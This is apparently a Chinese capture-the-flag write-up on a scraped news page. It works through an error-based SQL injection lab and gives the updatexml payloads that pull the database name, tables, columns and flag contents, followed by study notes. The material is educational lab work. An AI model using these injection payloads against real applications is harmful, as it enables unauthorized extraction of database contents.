当前位置: 首页 > news >正文

此网站正在建设中页面网站如何备案流程

news 2025/9/17 12:52:43
此网站正在建设中页面,网站如何备案流程,同一素材 不同的布局网站设计,简单的设计网站进入靶场 按照提示输入1 显示查询正确 既然是报错注入,先判断整形还是字符型注入 先输入1 and 11 再输入1 and 12 都显示查询正确,可知此为字符串型注入,不是数字型注入 然后就不会了 求助AI和其他wp 由以上2张搜索结果知updatexml是适用…

进入靶场

按照提示输入1

显示查询正确

既然是报错注入,先判断整形还是字符型注入

先输入1 and 1=1

再输入1 and 1=2

都显示查询正确,可知此为字符串型注入,不是数字型注入

然后就不会了

求助AI和其他wp

由以上2张搜索结果知updatexml是适用于字府串型注入的函数,且知道大概用法,开始注入

爆出库名          1 and updatexml(1,concat(0x7e,database()),3)

爆出表名                 1 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='sqli')),3)

爆出字段名           1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='flag')),3)

 并没有显示字段名,添加了库名后才显示,应该是含有多个flag表,添加库名缩小了范围便显示出来了

1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='sqli' and table_name='flag')),3)

爆出字段内容        1 and updatexml(1,concat(0x7e,(select group_concat(flag)from sqli.flag)),3)

得到flag

笔记

1,报错注入先判断是字府串型注入还是数字注入

2,判断出类型便可运用相关函数

3,updatexml函数

 1 and updatexml(1,concat(0x7e,database()),3)

第一个与第三个参数随便写,因为我们并不用它,参数2处的concat 是一个用于连接字符串的函数,0x7e代表16进制,避免特殊字符造成的错误

http://www.yayakq.cn/news/209310/

相关文章:

  • 长沙市设计网站公司网站运营工作具体做啥
  • 网站宣传的方法主要有图书馆网站建设网站的目的
  • flash网站效果中文软件开发平台
  • 佛山建网站公司哪家好江西网上注册公司流程
  • 网站设计经典案例企业网站建设外包服务合同
  • 英孚做网络作业的网站图片生成二维码软件
  • 网站后台怎么上传文章wordpress音乐页面下载
  • 网站备案表格样本北京平面设计公司招聘信息
  • 无锡网站营销公司如何建立企业网站及企业网站推广
  • 加强网站安全建设方案羽毛球网站建设网站
  • 腾云公司做网站wordpress前台发文积分
  • 网站建设祥云平台网站设计遇到的问题
  • 长沙教育类网站建设企业网站哪家做得比较好
  • 网站上那些轮播图视频怎么做的net域名 著名网站
  • 国外商业网站建设湖北智能建站系统价格
  • 360网站在系统那里杭州g20网站建设公司
  • php做网站完整视频一站式服务宣传语
  • 新媒体 网站建设 管理规范域名注册查询入口
  • 网站建设图片按钮绍兴网站推广优化
  • 男女这样做那个网站网站页面设置手机版
  • 易语言怎么用网站做背景音乐中小企业网站建设调研报告
  • 用canvas做网站新手如何学代码
  • 网站搜索排名小程序制作的方法
  • 工业制品网站建设目前好的推销网站
  • 压缩图片在线网站免费做视频网站多大服务器
  • 网站怎么做内链外链wordpress伪原创插件
  • 旅游网站的后台管理系统怎么做抓取微博 Wordpress
  • 企业网站的步骤网站域名到期怎么续费
  • 网门网站下载地址网站建设实训总结
  • 网站内容采编怎么做wordpress怎么换log